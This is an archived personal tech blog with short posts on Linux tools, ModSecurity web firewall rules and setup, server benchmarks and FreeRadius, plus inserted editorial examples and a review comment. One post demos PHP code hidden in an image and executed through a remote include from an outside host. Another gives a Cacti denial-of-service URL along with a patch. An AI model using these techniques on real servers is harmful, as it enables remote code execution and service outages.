If the previous version of VMware Converter for Linux was quite buggy (I had errors when trying to convert virtual machines stored on NFS or mounted via SSH/FUSE), version 4.0.1 works well: I installed it on a VM running Ubuntu 9.04 and managed to convert (Windows) VMs without any problem.
Read the complete article »

August 20, 2009, 2:30 pm

BlueProximity: this small Gnome applet automatically locks the X11 session depending on your distance from the machine, or rather on the distance of your Bluetooth mobile phone. It is by no means unbreakable, but it is still very handy (and fun)!

More info in this forum.

September 11, 2008, 9:54 am

So your boss asked you to secure his new strategic web application, which is part of his plan to conquer the world. But those damn developers are used to thinking their work is finished as soon as it just works, and debugging their whole code is simply not an option. Here’s the solution: use a web application firewall like ModSecurity2.

ModSecurity can be embedded as a module in your web server, or you can set up an Apache-based reverse proxy with ModSecurity protecting multiple web sites, without caring which kind of server they are running on.

It can be used in different ways: either to intercept known exploits or suspicious activity, or to allow only your application’s known pages, parameters, and the kind of characters each parameter value is supposed to carry… The latter might require a lot of work, so you may want to combine generic rules with a few rules dedicated to blocking the holes you’ve just found on your brand new web site.

A set of “generic rules” is provided with ModSecurity: the Core Rules. For optimization reasons, the regular expressions (rules are regex-based) are merged into a small number of rules, which makes most of them nearly unreadable. The script used for this merging was not yet released, but should be in the “near future” according to Breach. Update: yes, it was released here!

You might also pick rules from alternative sources, like gotroot.com.

If you install rules from the tarball found on the web site, be sure to remove write permissions on them for everybody (yes, the default permissions are -rw-rw-rw-!!!).

Now, let’s try to make a few rules:

You might first want to whitelist an IP address. The following rule can be added to your own file in the core rules directory, or better (especially if you have multiple virtual hosts), to the virtual host config file:

<IfModule mod_security2.c>
    # Dots are escaped: an unescaped "." would match any character.
    SecRule REMOTE_ADDR "^192\.168\.1\.100$" "phase:1,nolog,allow,ctl:ruleEngine=DetectionOnly"
</IfModule>

Read the complete article »
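What the whitelisting approach described above looks like in practice, as an added example that is not from the original post: a ModSecurity 2 rule set for a hypothetical application exposing a single page, /login.php, with two parameters, user and pass. The page path, parameter names, allowed character classes and rule ids are all assumptions to be adapted to your own site.

```apache
# Added example (not from the original post). Everything below assumes a
# hypothetical application with one page, /login.php, and two parameters,
# "user" and "pass"; the rule ids (1000-1004) are arbitrary as well.
<IfModule mod_security2.c>
    SecRuleEngine On
    # Needed so that POST parameters are available in ARGS during phase 2.
    SecRequestBodyAccess On

    # Trusted admin host: stop all rule processing for its requests.
    # The dots are escaped, otherwise "." would match any character.
    SecRule REMOTE_ADDR "^192\.168\.1\.100$" "id:1000,phase:1,nolog,allow"

    # 1. Only the known page may be requested.
    SecRule REQUEST_FILENAME "!^/login\.php$" \
        "id:1001,phase:1,t:none,deny,status:403,log,msg:'Unknown page'"

    # 2. Only the known parameter names may be sent (ARGS_NAMES holds every
    #    query-string and body parameter name).
    SecRule ARGS_NAMES "!^(?:user|pass)$" \
        "id:1002,phase:2,t:none,deny,status:403,log,msg:'Unknown parameter %{MATCHED_VAR}'"

    # 3. Each parameter only accepts the characters it is supposed to carry.
    SecRule ARGS:user "!^[a-zA-Z0-9._-]{1,64}$" \
        "id:1003,phase:2,t:none,deny,status:403,log,msg:'Bad characters in user'"
    SecRule ARGS:pass "!^[\x21-\x7e]{1,128}$" \
        "id:1004,phase:2,t:none,deny,status:403,log,msg:'Bad characters in pass'"
</IfModule>
```

Test such a set with SecRuleEngine DetectionOnly first: every rule then logs instead of blocking, which shows which legitimate requests it would have hit. A positive-security set like this breaks the site the moment a developer adds a parameter, which is exactly why the post suggests combining it with the generic rules.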

November 29, 2007, 1:08 am

Since all current CPUs in new servers are able to run in 64-bit mode, and most Linux distributions are also available in 64-bit versions, I was wondering why we still keep installing 32-bit operating systems.

So, I took two Dell PowerEdge 1950 servers, each with two Intel Pentium 4 Xeon quad-core 2 GHz CPUs and 2 GB of RAM, and installed the Debian 4.0 (Etch) Linux distribution on both. On the first one, the usual i386 version was installed; on the second, the amd64 version.


Do not confuse EM64T with IA-64: IA-64 is the name of an architecture (mostly unused now) for Itanium processors, developed by Intel in collaboration with HP. EM64T is the 64-bit instruction set you get when you buy a server with an Intel processor. Officially, it is different from AMD’s. In fact, not really that much: apart from subtle differences in instruction sets, one implementing 3DNow! and the other SSE3, they are almost compatible.

The tests:

The tests were performed in two areas where high CPU performance is required, database and SSL requests, and in two forms: a generic benchmark, and a home-made test which aims to be more representative of real life:

  • First, MySQL performance, using sql-bench (provided by MySQL), and secondly, SQL statistics queries on a 1 507 500 entry database extracted from a production MySQL RADIUS log server.
  • Next, an SSL performance test with the OpenSSL built-in speed test, followed by a (quickly) home-made script which makes an increasing number of concurrent HTTPS requests for a 14K text file and measures the time spent.

Read the complete article »

August 29, 2007, 9:07 am

As reported by the ISC, some people are using images to hide PHP code: if an image contains PHP code, for example in its comment section, it can be included like a usual PHP file, and the PHP code will be happily executed. It may be a great way to hide malicious code on hacked servers and to bypass some IDS/WAF…

Here’s a demo: create a PHP file that includes this innocent image:

<?php
// Including a remote URL requires allow_url_include=On (PHP >= 5.2) or, on
// older versions, allow_url_fopen=On; PHP then executes any <?php ... ?>
// block it finds in the image, here inside the GIF comment section.
include("http://mdessus.free.fr/Divers/imgwithphpcmd.gif");
?>

go to the previously created file’s URL, and voilà:

PHP commands embedded from an image

June 19, 2007, 4:19 pm

It is possible for an authenticated Cacti user to modify the graph_start and graph_end parameter values in the URL and specify higher numbers than expected, in order to make Cacti use all the server’s CPU.
For example, if a user modifies a graph URL as seen in the location bar:

http://localhost/cacti/graph_image.php?local_graph_id=2&rra_id=0&view_type=tree&graph_start=1164236234&graph_end=1179871034

to this one:

http://localhost/cacti/graph_image.php?local_graph_id=2&rra_id=0&view_type=tree&graph_start=1164236234000&graph_end=1179871034000

rrdtool will take 100% of the CPU (for a long time). By making multiple requests like this, an attacker can create a denial of service on the server running Cacti.

Proposed patch:

Modify the check done in the file lib/html_validate.php (function input_validate_input_number in the current Cacti version) by adding a second check like this:

36a37,39
>        if ($value >= 10000000000) {
>              die_html_input_error();
>        }
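Review bot: the added check only bounds the absolute magnitude of each value, not the span between graph_start and graph_end, which is what the denial of service described above actually exploits; a request with graph_start=0 and graph_end=9999999999 still passes this test. Consider also bounding graph_end - graph_start to a maximum span where both values are known together (and rejecting negative values), and replacing the magic number 10000000000 with a named constant. Note too that 10000000000 exceeds PHP_INT_MAX (2147483647) on 32-bit PHP builds, so the literal silently becomes a float there; the comparison against a numeric string still works, but that deserves a comment.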

Read the complete article »

June 2, 2007, 12:17 pm

One of Firefox’s great strengths is the ability to add extensions, which bring new features or modify its behaviour. Here are the most useful ones:

  • Adblock Plus: this extension removes most advertisements, making pages more readable and lighter to download.
  • Firebug: without any doubt the most advanced and accomplished of Firefox extensions, simply indispensable for developers (among others):
    • Web requests (with individual and cumulative load times, headers, responses…)
    • JavaScript debugging and profiling
    • Dynamic analysis and modification of HTML, DOM, CSS…
  • Web Developer: adds a toolbar for web developers with features that overlap with or complement the previous extension.
  • gTranslate: the simplest, but also one of the most practical of all these extensions. Once the default languages are chosen, just select a word or a sentence, then click on translate in the right-click menu, and the expression is translated (courtesy of Google).
  • Mouse Gestures: bind mouse gestures to your most frequently used actions.
  • Nagios Checker: for Nagios users, this plugin adds the list of Nagios alarms to the Firefox status bar.
  • PrefBar: provides a customizable bar with buttons for various tasks: disabling popups, disabling Java, selecting a proxy, changing the user-agent… Usable as a dedicated bar or inserted into the bookmarks bar.
  • Greasemonkey: lets you modify a web site’s behaviour (to remove an annoying behaviour or to add features, for example) using scripts written by others or by yourself.
  • Tab Mix Plus: adds many features to tabs, such as the ability to reorder them, but above all, undo close tab!

Many other extensions are available on the Mozilla site.

May 18, 2007, 11:18 pm

ModSecurity2 is a Web Application Firewall integrated into Apache as a module. You can use it on the final web server by adding the module (especially if you have an HTTPS web server, so that your IDS/IPS cannot analyze those flows), or by adding an Apache-based reverse proxy in front of your web server(s).
This will show you how to install ModSecurity on your favourite Linux, Debian Sarge or Ubuntu Edgy Eft.

You first need to download the source tarball from the Breach web site.

Check that you have removed any previously installed version (apt-get remove libapache2-mod-security mod-security-common on Ubuntu), and install the required development files:

apt-get install apache2-prefork-dev  libxml++2.6-dev

(the default Apache version is mpm-prefork, but you can check whether you are using the prefork or the threaded version with the command dpkg --get-selections | grep apache2).

In the directory where you have (already) untarred the ModSecurity package, go to the apache2 directory and, in the Makefile, look for the line containing top_dir and replace it with:

top_dir      = /usr/share/apache2/

Then, execute the make command.

Once the compilation ends, install the module (as root): sudo make install

You must now configure Apache for loading the module:
Read the complete article »
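What the Apache side of this last step typically looks like, as an added example and not the post’s own continuation: a minimal configuration that loads a ModSecurity 2 module built from source on a Debian/Ubuntu layout and starts it in detection-only mode. The library and module paths, log locations and the Include directory are assumptions and must match what make install actually produced on your system.

```apache
# Added example (not from the original post). Paths below are assumptions
# for a Debian/Ubuntu layout; check where "make install" put mod_security2.so.

# mod_security2 needs libxml2 (request body parsing) and mod_unique_id (the
# UNIQUE_ID used to correlate audit log entries); load both before it.
LoadFile   /usr/lib/libxml2.so.2
LoadModule unique_id_module /usr/lib/apache2/modules/mod_unique_id.so
LoadModule security2_module /usr/lib/apache2/modules/mod_security2.so

<IfModule mod_security2.c>
    # Start in detection-only mode: rules are evaluated and logged but never
    # block, so a bad rule cannot take the site down. Switch to On once the
    # audit log looks clean.
    SecRuleEngine DetectionOnly

    # Inspect request bodies (POST parameters) too, with a size cap so that
    # a huge upload cannot exhaust memory; responses are left alone.
    SecRequestBodyAccess On
    SecRequestBodyLimit 13107200
    SecResponseBodyAccess Off

    # Audit only transactions that triggered a rule or ended in a 5xx error.
    SecAuditEngine RelevantOnly
    SecAuditLogRelevantStatus "^5"
    SecAuditLog /var/log/apache2/modsec_audit.log

    # Debug log stays off (level 0) outside troubleshooting sessions.
    SecDebugLog /var/log/apache2/modsec_debug.log
    SecDebugLogLevel 0

    # Your own rules and the Core Rules, one file each (assumed directory).
    Include /etc/apache2/modsecurity/*.conf
</IfModule>
```

Run apache2ctl configtest after adding this, then reload Apache; a missing LoadFile for libxml2 is the usual cause of the module failing to load on a fresh source build.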

March 19, 2007, 2:39 pm

FreeRadius is now the default RADIUS server at my employer (a French telco/ISP), and we are really happy with it. However, I was asked to find a way to do round-robin distribution between LNS, and that is not a FreeRadius feature.
I first started by using an external program, executed via the attr_rewrite module, to randomly select an LNS in the database and replace it in the reply:

#!/bin/sh
# Pick one LNS at random from the "lns" table (called from attr_rewrite).
# Note: a password passed with -p is visible to every local user in "ps".
LNS=`mysql -ss -e "SELECT ip FROM lns ORDER BY RAND() LIMIT 1;" -h dbhost -u dbuser -pdbpass radius`
echo -n "$LNS"

But this only works for replacing one parameter: I cannot replace several parameters at once, and since the values must match each other (the Tunnel-Server-Auth-Id name must match the Tunnel-Server-Endpoint IP), making several independent random choices is not an option.

So, my solution consists in modifying the SQL groupreply query (in the sql.conf file).
Read the complete article »

March 15, 2007, 7:04 pm

After six months of nice work on my laptop (Asus V6J), Ubuntu has released a new version, code name Edgy Eft (version 6.10). The upgrade worked quite well on my laptop, with only a few minor annoyances (the worst problem was caused by the generation of a wrong UUID for swap).

What’s new in this release:

  • Optimized startup with Upstart, an init replacement
  • Some software updates (Firefox 2)
  • The memory card reader is working (with SD card, but not with Memory stick)

So, is it worth the upgrade? No real revolution: this release is mostly a minor update.

March 1, 2007, 1:46 am